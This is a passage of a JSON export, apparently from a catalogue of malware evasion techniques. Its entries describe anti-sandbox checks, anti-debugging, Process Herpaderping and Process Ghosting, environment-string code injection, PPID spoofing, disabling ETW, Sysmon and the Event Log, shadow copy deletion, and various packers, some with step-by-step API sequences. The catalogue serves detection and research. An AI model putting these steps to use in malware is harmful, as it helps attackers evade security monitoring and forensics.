"description": "Online sandbox has become very popular for malware analysis. Several malware authors employ such techniques to avoid detection and analysis. Some of these techniques will be summarized here.\r\n\r\n* Any.Run uses a fake root certificate to spy on sandbox traffic. The first information about the system can be obtained by querying the information of the root certificate. In addition, the QEMU Agent is modified and used to monitor the applications running in the virtual machine allowing the sandbox to do API hooking and monitor the analyzed process. If a process name such as \"srvpost.exe\" is running and the \"winanr.dll\", \"winsanr.dll\" libraries are loaded, it is possible to detect the Any.Run agent.\r\n\r\n* Any.Run offers many packages to their users. And in addition to the features they are offering in these packages, they also determine the maximum number of minutes for active analysis. For example, you can analyze a file for 5 minutes by default with the Searcher package, that you pay 90 dollars to acquire, and you can make this time a maximum of 10 minutes by adding time in interactive mode. The sechost.dll in the agent contains and transmits the timing metrics of ANY.RUN. When we suspend this thread, Any.Run stops its counter and the analysis continues until it drops to timeout.",
"resources": "https://malwation.com/offensive-approach-to-online-sandboxes-1-any-run/\nhttps://gist.github.com/kaganisildak/4ff8adcaba2521a28a7029d61c265d16\nhttps://app.any.run/tasks/5bff31df-4688-41b1-a73a-d15d30e7ac54/\nhttps://app.any.run/",
"creation_date": "2021-03-10T14:32:11Z",
"tags": "",
"modification_date": "2023-10-04T10:44:43.778000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
2,
18,
22,
23,
24,
25,
26,
27,
28,
29,
30,
317,
320,
364,
381,
412,
419,
425
],
"contributors": []
},
{
"id": 169,
"key": "localsize0",
"unprotect_id": "U0128",
"name": "LocalSize(0)",
"description": "The function `LocalSize` retrieves the current size of the specified local memory object, in bytes. By setting the `hMem` parameters with 0 will trigger an exception in a debugger that can be used as an anti-debugging mechanism.",
"resources": "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-localsize",
"creation_date": "2021-04-29T08:15:47Z",
"tags": "localsize",
"modification_date": "2023-10-04T10:42:33.492000Z",
"category": [
3
],
"rules": [
39,
81
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 170,
"key": "process-herpaderping",
"unprotect_id": "U1231",
"name": "Process Herpaderping",
"description": "Process Herpaderping is a method of obscuring the intentions of a process by modifying the content on a disk after the image has been mapped. This results in curious behavior by security products and the OS itself.\r\n\r\nTo abuse this convention, we first write a binary to a target file on a disk. Then, we map an image of the target file and provide it to the OS to use for process creation. The OS kindly maps the original binary for us. Using the existing file handle, and before creating the initial thread, we modify the target file content to obscure or fake the file backing the image. Sometime later, we create the initial thread to begin the execution of the original binary. Finally, we will close the target file handle. Let's walk through this step-by-step:\r\n\r\n1. Write target binary to disk, keeping the handle open. This is what will execute in memory.\r\n2. Map the file as an image section `NtCreateSection, SEC_IMAGE`.\r\n3. Create the process object using the section handle `NtCreateProcessEx`.\r\n4. Using the same target file handle, obscure the file on disk.\r\n5. Create the initial thread in the process `NtCreateThreadEx`.\r\n * At this point, the process creation callback in the kernel will fire. The contents on the disk do not match what was mapped. Inspection of the file at this point will result in incorrect attribution.\r\n6. Close the handle. `IRP_MJ_CLEANUP` will occur here.\r\n * Since we've hidden the contents of what is executing, inspection at this point will result in incorrect attribution.",
"resources": "https://github.com/jxy-s/herpaderping",
"creation_date": "2021-06-16T11:45:24Z",
"tags": "",
"modification_date": "2023-10-04T10:42:52.190000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
2,
13,
357,
381,
445,
449,
459
],
"contributors": []
},
{
"id": 171,
"key": "process-ghosting",
"unprotect_id": "U1232",
"name": "Process Ghosting",
"description": "Process Ghosting is a technique used to bypass detection by manipulating the executable image when a process is loaded. \r\n\r\nWindows attempts to prevent mapped executables from being modified. Once a file is mapped into an image section, attempts to open it with `FILE_WRITE_DATA` (to modify it) will fail with `ERROR_SHARING_VIOLATION`. Deletion attempts via `FILE_DELETE_ON_CLOSE`/`FILE_FLAG_DELETE_ON_CLOSE` fail with `ERROR_SHARING_VIOLATION`. `NtSetInformationFile`(`FileDispositionInformation`) requires the `DELETE` access right. Even though the `DELETE` access right is granted to files mapped to image sections, `NtSetInformationFile`(`FileDispositionInformation`) fails with `STATUS_CANNOT_DELETE`. Deletion attempts via `FILE_SUPERCEDE`/`CREATE_ALWAYS` fail with `ACCESS_DENIED`. \r\n\r\nAn important note, however, is that this deletion restriction only comes into effect once the executable is mapped into an image section. This means that it is possible to create a file, mark it for deletion, map it to an image section, close the file handle to complete the deletion, then create a process from the now-fileless section. This is Process Ghosting.\r\n\r\nThe attack flow is:\r\n\r\n1. Create a file\r\n2. Put the file into a delete-pending state using `NtSetInformationFile`(FileDispositionInformation). Note: Attempting to use `FILE_DELETE_ON_CLOSE` instead will not delete the file.\r\n3. Write the payload executable to the file. The content isn’t persisted because the file is already delete-pending. The delete-pending state also blocks external file-open attempts.\r\n4. Create an image section for the file.\r\n5. Close the delete-pending handle, deleting the file.\r\n6. Create a process using the image section.\r\n7. Assign process arguments and environment variables.\r\n8. Create a thread to execute in the process.",
"resources": "https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack",
"creation_date": "2021-06-16T11:50:05Z",
"tags": "",
"modification_date": "2023-10-04T10:44:44.110000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 172,
"key": "killing-windows-event-log",
"unprotect_id": "U0304",
"name": "Killing Windows Event Log",
"description": "Killing the Windows Event Log is a technique used by malware to prevent security professionals from detecting and analyzing it. Svchost.exe is a process that manages services on Windows operating systems. \r\n\r\nBy grouping multiple services into a single process, Svchost.exe conserves computing resources and reduces resource consumption. However, this also means that Svchost.exe manages the Event Log service, which is responsible for collecting logs on the system. \r\n\r\nBy targeting the Event Log service and killing the threads responsible for it, malware can prevent the system from collecting logs, making it more difficult for security professionals to detect and analyze the malware.",
"resources": "https://github.com/hlldz/Phant0m",
"creation_date": "2021-07-27T13:03:31.911000Z",
"tags": "Windows Event Log,\r\nAnti-forensic,\r\nSvchost.exe,\r\nServices,\r\nProcess,\r\nEvent Log service,\r\nThreads,",
"modification_date": "2023-10-04T10:43:11.626000Z",
"category": [
8
],
"rules": [
11
],
"attachments": [],
"featured_api": [
18,
24,
25,
28,
29,
30,
412,
425
],
"contributors": []
},
{
"id": 173,
"key": "access-token-manipulation-parent-pid-spoofing",
"unprotect_id": "U1234,T1134.004",
"name": "Access Token Manipulation: Parent PID Spoofing",
"description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. \r\n\r\nOne way of explicitly assigning the PPID of a new process is via the `CreateProcess` API call, which supports a parameter that defines the PPID to use. This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.\r\n\r\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment. This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.\r\n\r\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.",
"resources": "https://github.com/hlldz/APC-PPID\nhttps://attack.mitre.org/techniques/T1134/004/",
"creation_date": "2021-07-27T13:05:01.292000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nparent process identifier (PPID),\r\nevade process-monitoring defenses,\r\nCreateProcess API call,\r\nUser Account Control (UAC),\r\ninherited access token,",
"modification_date": "2023-10-04T10:42:20.837000Z",
"category": [
4,
10
],
"rules": [
88
],
"attachments": [],
"featured_api": [
3,
4,
6,
11,
21,
22,
23,
24,
26,
27,
28,
365
],
"contributors": []
},
{
"id": 174,
"key": "user-interaction-are-you-human",
"unprotect_id": "U1339,E1204",
"name": "User Interaction (Are you human?)",
"description": "You can get an advantage against sandboxes by using user interaction techniques. For example, The average user has a username and password and as long as the user you are targeting does not enter their password correctly, you can prevent your malware execution and bypass the possible sandbox control.",
"resources": "https://github.com/hlldz/pickl3",
"creation_date": "2021-07-27T13:07:49.117000Z",
"tags": "",
"modification_date": "2023-10-04T10:42:17.582000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
23
],
"contributors": []
},
{
"id": 175,
"key": "volume-shadow-copy-service-vscvss-deletion",
"unprotect_id": "U0305,T1070.004",
"name": "Volume Shadow Copy Service (VSC,VSS) Deletion",
"description": "Deleting Volume Shadow Copy makes the forensic investigation more difficult in terms of the recovery of previous artifact evidence. In addition, attackers using ransomware often delete VSCs not to be able to recover the original files of the encrypted files from VSCs. \r\n\r\nOn the other hand, deleting by using vssadmin and WMIC is on a file system level, the actual data remains in clusters. Thus, it may be able to be recovered from VSC until other files overwrite the clusters.",
"resources": "https://docs.microsoft.com/ja-jp/windows-server/administration/windows-commands/vssadmin-delete-shadows\nhttps://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\nhttps://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware\nhttps://blog.avast.com/zepto-ransomware-now-introduces-new-features-to-better-encrypt-your-files\nhttp://www.kazamiya.net/DeletedSC\nhttps://github.com/mnrkbys/vss_carver\nhttps://www.shadowexplorer.com/",
"creation_date": "2022-02-24T05:19:24.338000Z",
"tags": "VSC,ShadowCopy,Ransomware",
"modification_date": "2023-10-04T10:42:47.308000Z",
"category": [
8,
10
],
"rules": [
33,
34,
37,
56,
63
],
"attachments": [],
"featured_api": [],
"contributors": [
18
]
},
{
"id": 176,
"key": "anti-upx-unpacking",
"unprotect_id": "U1008",
"name": "Anti-UPX Unpacking",
"description": "Anti-UPX Unpacking is the technique to prevent malware from being unpacked by tools like UPX. UPX packed binary indicates that the section names starting with UPX followed by a number (UPX0 and UPX1) and the string “UPX!” at the end of the PE header. This UPX reference structure is located at the end of the PE header and the header includes checksums, packed and unpacked sizes, and compression details.\r\n\r\nThere are some methods to bypass unpacking using \"upx -d\" since a long time ago.\r\n\r\nOne easy way is to change section names to different strings, this is the example. The normal section names packed by UPX are \"UPX0\", \"UPX1\" .. and \".rsrc\". The unpacking command \"upx -d\" raises this kind of exception of \"CantUnpackException: file is possibly modified/hacked/protected; take care!\" in this case and results in preventing from unpacking.\r\n\r\nAnother method is zero-padding against any size or checksum infos in UPX reference structure. The \"upx -d\" raises this kind of exception of \"CantUnpackException: header corrupted\" at this time and results in preventing from unpacking.",
"resources": "https://github.com/upx/upx/blob/master/src/stub/src/include/header.S\nhttps://bsodtutorials.wordpress.com/2014/11/14/upx-packing-and-anti-packing-techniques/\nhttps://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html\nhttps://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/",
"creation_date": "2022-03-29T23:11:58.387000Z",
"tags": "antiUPX",
"modification_date": "2023-10-04T10:44:35.496000Z",
"category": [
14
],
"rules": [
50
],
"attachments": [],
"featured_api": [],
"contributors": [
18
]
},
{
"id": 177,
"key": "disabling-event-tracing-for-windows-etw",
"unprotect_id": "U0306",
"name": "Disabling Event Tracing for Windows (ETW)",
"description": "Many EDR solutions leverage Event Tracing for Windows (ETW) extensively. ETW allows for extensive instrumentation and tracing of a process functionality and WINAPI calls. It has components in the kernel, to register callbacks for system calls and other kernel operations, but also consists of a userland component that is part of ntdll.dll. \r\n\r\nSince ntdll.dll is a DLL loaded into the process of a binary, an attacker can have full control over this DLL and therefore the ETW functionality. The most common nypassing technique is patching the function EtwEventWrite which is called to write/log ETW events. It is possible to fetch its address in ntdll.dll, and replace its first instructions with instructions to return 0 (SUCCESS).",
"resources": "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/",
"creation_date": "2022-04-19T00:09:38.360000Z",
"tags": "anti-forensic",
"modification_date": "2023-10-04T10:42:56.937000Z",
"category": [
8
],
"rules": [],
"attachments": [],
"featured_api": [
340,
419,
425
],
"contributors": []
},
{
"id": 178,
"key": "procenvinjection-remote-code-injection-by-abusing-process-environment-strings",
"unprotect_id": "U1235",
"name": "ProcEnvInjection - Remote code injection by abusing process environment strings",
"description": "This method allows to inject custom code into a remote process without using `WriteProcessMemory` - It will use the `lpEnvironment` parameter in `CreateProcess` to copy the code into the target process. This technique can be used to load a DLL into a remote process, or simply execute a block of code.\r\n\r\nThe `lpEnvironment` parameter in `CreateProcess` allows us to specify a custom environment string for the target process. The environment string contains a set of environment variable entries, such as `PATH=C:\\Windows\\system32;C:\\Windows`. Each environment variable in the list is separated by a null terminator character, and the final entry in the list is a blank string (two null terminator characters). When a new process is created, the environment string will be copied to the virtual memory of the process and it can then be accessed via the PEB.\r\n\r\nIn summary, the injector process takes the following steps:\r\n\r\n1. Create a generic \"code loader\" block which doesn't contain any 0x00 characters - values will be encoded with XOR if necessary.\r\n2. Use `GetEnvironmentStringsW` to retrieve the existing environment string and copy this to a temporary buffer. Our \"generic code loader\" entry will be appended to the end of the existing entries. Some programs make use of the environment variables, so it is not a good idea to overwrite the existing entries.\r\n3. Create a suspended instance of the target EXE process using `CreateProcess` with our custom environment string `lpEnvironment`. We will also use the `CREATE_UNICODE_ENVIRONMENT` flag to specify a wide-char environment value, otherwise the string will be converted from ANSI to wide-char which will break our loader code.\r\n4. Use `NtQueryInformationProcess` to retrieve the PEB address for the target process.\r\n5. Call `NtCreateThreadEx` to call Sleep(0) in the target process and wait for the thread to exit. This will force the necessary PEB fields to become initialised in the target process.\r\n6. Calculate the address of the environment string in the target process (PEB-> `RtlUserProcessParameters` -> Environment)\r\n7. Locate the address of our loader code within the environment string. Call `VirtualProtectEx` to make this data executable.\r\n8. Call `NtCreateThreadEx` to execute the loader code within the target process. This code will read the final payload back from the injector process and execute it.\r\n9. Restore the original memory protection after the payload has finished executing.\r\n10. Call `ResumeThread` to continue normal execution of the target process.",
"resources": "https://www.x86matthew.com/view_post?id=proc_env_injection",
"creation_date": "2022-06-13T23:45:30.988000Z",
"tags": "",
"modification_date": "2023-10-04T10:44:56.710000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
1,
2,
3,
7,
8,
12,
22,
23,
24,
25,
132,
339,
340,
341,
355,
357,
363,
381,
419,
425,
449
],
"contributors": []
},
{
"id": 179,
"key": "misusing-structured-exception-handlers",
"unprotect_id": "U0218, B0032.016",
"name": "Misusing Structured Exception Handlers",
"description": "Misusing Structured Exception Handlers is a technique used by malware to make it more difficult for security analysts to reverse engineer the code. Structured Exception Handlers (SEH) are functions that are used to handle exceptions in a program. These can be misused by malware to fool disassemblers and make it harder to analyze the code. One way this is done is by using the FS segment register to gain access to the Thread Environment Block (TEB), which contains a pointer to the Structured Exception Handler (SEH) chain. \r\n\r\nThe SEH chain functions like a stack, with the most recently pushed function being the one that is executed when an exception occurs. By manipulating the SEH chain, malware authors can make it more difficult for analysts to understand the code and identify any potentially malicious behavior.",
"resources": "https://1malware1.medium.com/anti-disassembly-techniques-e012338f2ae0",
"creation_date": "2022-06-13T23:55:04.099000Z",
"tags": "Structured Exception Handlers (SEH),\r\nException handling,\r\nThread Environment Block (TEB),\r\nStructured Exception Handler (SEH) chain,\r\nFS segment register,",
"modification_date": "2023-10-04T10:44:21.079000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 180,
"key": "thwarting-stack-frame-analysis",
"unprotect_id": "U0219",
"name": "Thwarting Stack-Frame Analysis",
"description": "Thwarting Stack-Frame Analysis is a technique used by malware to make it more difficult for security analysts to reverse engineer and analyze the code. A stack frame is a collection of data associated with a function, including local variables, arguments passed to the function, and the return address. Disassemblers can use information from the stack frame to understand a function's behavior.\r\n\r\nHowever, malware authors can use various techniques to defeat this analysis and make it harder to understand the code. For example, they may use complex control flow structures, such as nested loops and conditionals, to make it difficult for the disassembler to track the flow of execution. \r\n\r\nThey may also use techniques like code obfuscation and API hashing to hide the names of functions and make it harder to identify potentially malicious behavior. By using these techniques, malware authors can make it more difficult for security analysts to analyze and understand their code, and thwart stack-frame analysis.",
"resources": "https://1malware1.medium.com/anti-disassembly-techniques-e012338f2ae0",
"creation_date": "2022-06-13T23:57:13.593000Z",
"tags": "Stack frame,\r\nDisassembly,\r\nControl flow,",
"modification_date": "2023-10-04T10:42:59.213000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [
364,
376,
425
],
"contributors": []
},
{
"id": 181,
"key": "shellcode-injection-via-createthreadpoolwait",
"unprotect_id": "U1236",
"name": "Shellcode Injection via CreateThreadpoolWait",
"description": "Shellcode injection is a technique used by malware to execute arbitrary code within the context of a targeted process. One method of achieving this is through the use of the `CreateThreadpoolWait` function, which is a part of the Windows thread pool API.\r\n\r\nIn the context of shellcode injection, `CreateThreadpoolWait` is used to create a wait object that is associated with a thread pool. The malware can then use this wait object to execute its shellcode within the context of the targeted process, by passing the shellcode as a callback function to the `CreateThreadpoolWait` function.\r\n\r\nHere is a summary of the steps:\r\n\r\n1. The malware creates an event object with the `CreateEvent` function, and sets it to the Signaled state.\r\n\r\n2. The malware allocates read-write-execute (RWX) memory for the shellcode using the `VirtualAlloc` function and writes the shellcode to this memory.\r\n\r\n3. The malware creates a wait object using the `CreateThreadpoolWait` function and specifies the address of the shellcode as the callback function.\r\n\r\n4. The malware sets the wait object using the `SetThreadpoolWait` function.\r\n\r\n5. The malware waits for the wait object to become signaled using the `WaitForSingleObject` function. When the wait object is signaled, the callback function (which contains the shellcode) is executed.\r\n\r\nOther techniques injection includes using APIs such as `CreateRemoteThread`, `QueueUserWorkItem`, and `NtCreateThreadEx`.",
"resources": "https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait",
"creation_date": "2022-06-19T05:36:49.903000Z",
"tags": "Shellcode injection,\r\nProcess injection,\r\nCreateThreadpoolWait,\r\nEvent object,\r\nVirtualAlloc,\r\nCallback function,\r\nSetThreadpoolWait,\r\nWaitForSingleObject,",
"modification_date": "2023-10-04T10:44:58.752000Z",
"category": [
4
],
"rules": [
132
],
"attachments": [],
"featured_api": [
2,
3,
449
],
"contributors": []
},
{
"id": 182,
"key": "unloading-sysmon-driver",
"unprotect_id": "U0407",
"name": "Unloading Sysmon Driver",
"description": "Sysmon is a tool that can be used to monitor system activity on Windows systems. It records various types of events, such as process creation, network connections, and registry changes, and stores them in the Windows Event Log. Security analysts can use this information to detect and investigate malicious activity on a system.\r\n\r\nOne way that malware can evade detection by Sysmon is by unloading the Sysmon driver. The Sysmon driver is the kernel-mode component of Sysmon that is responsible for recording the events that Sysmon monitors. By unloading this driver, the malware can prevent Sysmon from recording any further events, and thus avoid being detected.",
"resources": "https://www.ired.team/offensive-security/defense-evasion/unloading-sysmon-driver",
"creation_date": "2022-06-19T05:53:40.014000Z",
"tags": "Sysmon,\r\nsystem activity,\r\nprocess creation,\r\nnetwork connections,\r\nregistry changes,\r\nWindows Event Log,\r\nSysmon driver,",
"modification_date": "2023-10-04T10:43:01.150000Z",
"category": [
6
],
"rules": [
128
],
"attachments": [],
"featured_api": [
425
],
"contributors": []
},
{
"id": 183,
"key": "upx-ultimate-packer-for-executables",
"unprotect_id": "U1402, F0001.008",
"name": "UPX: Ultimate Packer for Executables",
"description": "UPX is a tool that is used to compress and encrypt executables in order to make them smaller and more difficult to reverse engineer. UPX is free to use, portable, and can be extended with additional features. It is known for its high performance and compatibility with a wide range of executable formats. UPX is commonly used by software developers to reduce the size of their programs and to protect their intellectual property. It is also used by malware authors to make their malicious programs more difficult to detect and analyze.",
"resources": "https://en.wikipedia.org/wiki/UPX\nhttps://upx.github.io/",
"creation_date": "2022-06-19T06:06:02.419000Z",
"tags": "UPX,\r\nExecutable packer,\r\nCompression,\r\nEncryption,\r\nPortability,\r\nExtendability,\r\nHigh performance,",
"modification_date": "2023-10-04T10:43:29.826000Z",
"category": [
12
],
"rules": [
50,
94,
102
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 184,
"key": "mpress",
"unprotect_id": "U1403",
"name": "MPRESS",
"description": "MPRESS is a free packer. It makes programs and libraries smaller, and decrease start time when the application loaded from a slow removable media or from the network.\r\n\r\nIt uses in-place decompression technique, which allows to decompress the executable without memory overhead or other drawbacks; it also protects programs against reverse engineering by non-professional hackers. Programs compressed with MPRESS run exactly as before, with no runtime performance penalties.",
"resources": "https://www.autohotkey.com/mpress/mpress_web.htm",
"creation_date": "2022-06-19T06:36:36.466000Z",
"tags": "MPRESS",
"modification_date": "2023-10-04T10:43:03.756000Z",
"category": [
12
],
"rules": [
103
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 185,
"key": "alternate-exe-packer",
"unprotect_id": "U1404",
"name": "Alternate EXE Packer",
"description": "EXE Packer is able to compress executable files (type EXE) or DLL-files. Already compressed files may also be decompressed with this program. There exist 12 different levels for file-compression. This program is also able to create backups of the files that shall be compressed.\r\n\r\nIf a file is compressed the physical file-size is reduced on the respective device. A compressed file decompresses itself while being executed and can be used without this program. This program is freeware. It requires the .NET-framework 2.0 (already included in operation system since Windows Vista).",
"resources": "https://www.alternate-tools.com/pages/c_exepacker.php?lang=ENG",
"creation_date": "2022-06-19T06:38:02.569000Z",
"tags": "packer",
"modification_date": "2023-10-04T10:43:02.439000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 186,
"key": "exestealth",
"unprotect_id": "U1405",
"name": "ExeStealth",
"description": "ExeStealth is a tool that encrypts files to avoid detection and hacking. Designed by WebToolMaster, this free software is simple to implement and one of the best anti-hacking tools on the market, which also makes it effective at hiding malware code in your system.",
"resources": "https://www.webtoolmaster.com/exestealth.htm",
"creation_date": "2022-06-19T06:40:57.569000Z",
"tags": "ExeStealth",
"modification_date": "2023-10-04T10:43:03.974000Z",
"category": [
12
],
"rules": [
104
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 187,
"key": "themida",
"unprotect_id": "U1406, F0001.011",
"name": "Themida",
"description": "Themida is a commercial known packer that embeds several features including anti-debugging, virtual machine emulation, encryption... \r\n\r\n- Anti-debugger techniques that detect/fool any kind of debugger\r\n\r\n- Anti-memory dumpers techniques for any Ring3 and Ring0 dumpers\r\n\r\n- Different encryption algorithms and keys in each protected application\r\n\r\n- Anti-API scanners techniques that avoids reconstruction of original import table\r\n\r\n- Automatic decompilation and scrambling techniques in target application\r\n\r\n- Virtual Machine emulation in specific blocks of code\r\n\r\n- Advanced Mutator engine\r\n\r\n- Anti-disassembly techniques for any static and interactive disassembler\r\n\r\n- Multiple polymorphic layers with more than 50.000 permutations\r\n\r\n- Anti-monitors techniques against file and registry monitors\r\n\r\n- Random garbage code insertion between real instructions\r\n\r\n- Advanced Threads network communication\r\n\r\n- Anti-Memory patching and CRC techniques in target application\r\n\r\n- Metamorphic engine to scramble original instructions\r\n\r\n- Advanced Entry point protection\r\n\r\n- Dynamic encryption in target application\r\n\r\n- Anti-tracing code insertion between real instructions\r\n\r\n- Advanced Anti-breakpoint manager\r\n\r\n- Real time protection in target application\r\n\r\n- Compression of target application, resources and protection code\r\n\r\n- Anti-“debugger hiders” techniques\r\n\r\n- Full mutation in protection code to avoid pattern recognition\r\n\r\n- Real-time simulation in target application\r\n\r\n- Intelligent protection code insertion inside target application\r\n\r\n- Random internal data relocation",
"resources": "https://www.oreans.com/Themida.php",
"creation_date": "2022-06-19T06:54:28.145000Z",
"tags": "themida",
"modification_date": "2023-10-04T10:44:28.014000Z",
"category": [
12
],
"rules": [
98,
105
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 188,
"key": "mew",
"unprotect_id": "U1407",
"name": "MEW",
"description": "MEW is an EXE compression tool that was specifically designed to handle small files.",
"resources": "https://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/MEW-SE.shtml",
"creation_date": "2022-06-19T06:57:10.467000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:04.676000Z",
"category": [
12
],
"rules": [
106
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 189,
"key": "fsg",
"unprotect_id": "U1408",
"name": "FSG",
"description": "The free, simple FSG software compresses both small and large files. While it is popular and commonly used to hide malware code, it is also relatively simple to unpack through a decompression loop that writes the data to the final destination.",
"resources": "https://www.aldeid.com/wiki/Category:Digital-Forensics/Computer-Forensics/Anti-Reverse-Engineering/Packers/FSG",
"creation_date": "2022-06-19T06:59:46.574000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:05.013000Z",
"category": [
12
],
"rules": [
107
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 190,
"key": "alienyze",
"unprotect_id": "U1409",
"name": "Alienyze",
"description": "Alienyze is a software packer designed to compress executable files, allowing them to reduce the file size of their software as much as possible.\r\n\r\n\r\n- Anti-Debugger techniques that detect and fool present debuggers\r\n\r\n- Anti-VM techniques that detect sandbox & virtualized environments\r\n\r\n- Protection from disassemblers and software analysis tools\r\n\r\n- Hardware ID locking for making applications machine dependant\r\n\r\n- Integrity checks that detect code patching & tampering\r\n\r\n- Customizable compression and encryption of the applications code\r\n\r\n- Real time protection in running application\r\n\r\n- Project configuration settings Load, Save support\r\n\r\n- Multilingual user interface, language selection support",
"resources": "https://alienyze.com/",
"creation_date": "2022-06-19T07:05:32.278000Z",
"tags": "",
"modification_date": "2023-10-04T10:42:56.211000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 191,
"key": "vmprotect",
"unprotect_id": "U1410, F0001.010",
"name": "VMProtect",
"description": "VMProtect protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze and crack the software. Besides that, VMProtect generates and verifies serial numbers, limits free upgrades and much more.",
"resources": "https://vmpsoft.com/",
"creation_date": "2022-06-19T07:07:02.355000Z",
"tags": "vmprotect",
"modification_date": "2023-10-04T10:43:02.773000Z",
"category": [
12
],
"rules": [
100,
108
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 192,
"key": "aspack",
"unprotect_id": "U1411, F0001.013",
"name": "AsPack",
"description": "ASPack is an EXE packer created to compress Win32 executable files and to protect them against reverse engineering.\r\n\r\nThe solution makes Windows programs and libraries smaller up to 70% what leads to a reduction in the download time of compressed applications in local networks and the Internet because of their smaller size compared to uncompressed apps.\r\n\r\nThe ASPack exe compressor also provides protection to programs/applications from unprofessional analysis, debuggers and decompilers.",
"resources": "http://www.aspack.com/",
"creation_date": "2022-06-19T07:10:40.496000Z",
"tags": "aspack",
"modification_date": "2023-10-04T10:42:59.506000Z",
"category": [
12
],
"rules": [
95,
109
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 193,
"key": "petite",
"unprotect_id": "U1412",
"name": "PEtite",
"description": "Petite is a free Win32 (Windows 95/98/2000/NT/XP/Vista/7/etc) executable (EXE/DLL/etc) compressor. The compressed executables decompress themselves at run time and can be used just like the original non-compressed versions. \r\n\r\nPetite also adds virus detection to the compressed executables; they will check themselves for infection every time they are executed.",
"resources": "https://www.un4seen.com/petite/",
"creation_date": "2022-06-19T07:12:43.337000Z",
"tags": "petite",
"modification_date": "2023-10-04T10:42:56.579000Z",
"category": [
12
],
"rules": [
99,
110
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 194,
"key": "crinkler",
"unprotect_id": "U1413",
"name": "Crinkler",
"description": "Crinkler is a compressing linker for Windows, specifically targeted towards executables with a size of just a few kilobytes.",
"resources": "https://github.com/runestubbe/Crinkler",
"creation_date": "2022-06-19T07:36:46.756000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:05.747000Z",
"category": [
12
],
"rules": [
111
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 195,
"key": "pecompact",
"unprotect_id": "U1414",
"name": "PECompact",
"description": "PECompact is a Windows executable compressor. It has a plugin system that offers virtually customization.",
"resources": "https://bitsum.com/portfolio/pecompact/",
"creation_date": "2022-06-19T07:39:51.104000Z",
"tags": "pecompact",
"modification_date": "2023-10-04T10:42:55.129000Z",
"category": [
12
],
"rules": [
97
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 196,
"key": "asprotect",
"unprotect_id": "U1415",
"name": "AsProtect",
"description": "ASProtect is a multifunctional EXE packing tool designed for software developers to protect 32-bit applications with in-built application copy protection system.\r\n\r\nIt includes software compression, provides protection methods and tools for software from unauthorized copying, analysis, disassemblers and debuggers.\r\n\r\nASProtect 32 also provides enhanced work with registration keys and the ability to create a single application that can change its functionality or expiration, depending on the entered particular key.",
"resources": "http://www.aspack.com/asprotect32.html",
"creation_date": "2022-06-19T07:43:13.379000Z",
"tags": "asprotect",
"modification_date": "2023-10-04T10:42:55.472000Z",
"category": [
12
],
"rules": [
112
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 197,
"key": "nspack",
"unprotect_id": "U1416",
"name": "NsPack",
"description": "NsPack is a packer for 32bits and 64bits exe, dll, ocx, scr Windows program.",
"resources": "https://www.sans.org/white-papers/33428/",
"creation_date": "2022-06-19T07:46:10.909000Z",
"tags": "NsPack",
"modification_date": "2023-10-04T10:43:09.033000Z",
"category": [
12
],
"rules": [
96,
113
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 198,
"key": "confuserex",
"unprotect_id": "U1417",
"name": "ConfuserEx",
